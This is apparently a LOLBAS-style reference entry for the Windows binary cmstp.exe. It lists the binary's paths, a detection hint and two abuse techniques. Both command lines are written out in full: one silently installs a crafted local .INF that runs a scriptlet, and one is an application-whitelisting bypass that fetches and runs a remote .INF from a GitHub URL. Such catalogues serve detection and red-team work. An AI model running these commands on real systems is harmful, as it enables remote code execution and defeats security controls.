~/ cat Cmstp.exe.md █
Installs or removes a Connection Manager service profile.
Paths:
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
Detection: Execution of cmstp.exe should not be normal unless VPN is in use Cmstp.exe communication towards internet and getting files
Execute
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
AWL bypass
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf